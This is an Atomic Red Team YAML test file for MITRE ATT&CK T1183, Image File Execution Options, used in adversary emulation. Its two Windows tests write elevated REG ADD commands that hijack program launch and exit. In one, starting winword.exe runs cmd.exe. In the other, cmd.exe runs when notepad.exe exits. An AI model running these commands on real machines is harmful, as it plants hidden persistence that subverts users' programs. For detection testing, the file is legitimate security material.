Files
atomic-red-team/atomics/T1183/T1183.yaml
T
Carrie Roberts 1bfefdacfc Add elevated (#542)
* provide elevation_required attribute

* provide elevation_required attribute

* provide elevation_required attribute
2019-09-03 07:34:42 -06:00

50 lines
1.4 KiB
YAML

---
attack_technique: T1183
display_name: Image File Execution Options
atomic_tests:
- name: IFEO Add Debugger
description: |
Leverage Global Flags Settings
supported_platforms:
- windows
input_arguments:
target_binary:
description: Binary To Attach To
type: Path
default: winword.exe
payload_binary:
description: Binary To Execute
type: Path
default: cmd.exe
executor:
name: command_prompt
elevation_required: true
command: |
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
- name: IFEO Global Flags
description: |
Leverage Global Flags Settings
supported_platforms:
- windows
input_arguments:
target_binary:
description: Binary To Attach To
type: Path
default: notepad.exe
payload_binary:
description: Binary To Execute
type: Path
default: cmd.exe
executor:
name: command_prompt
elevation_required: true
command: |
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}"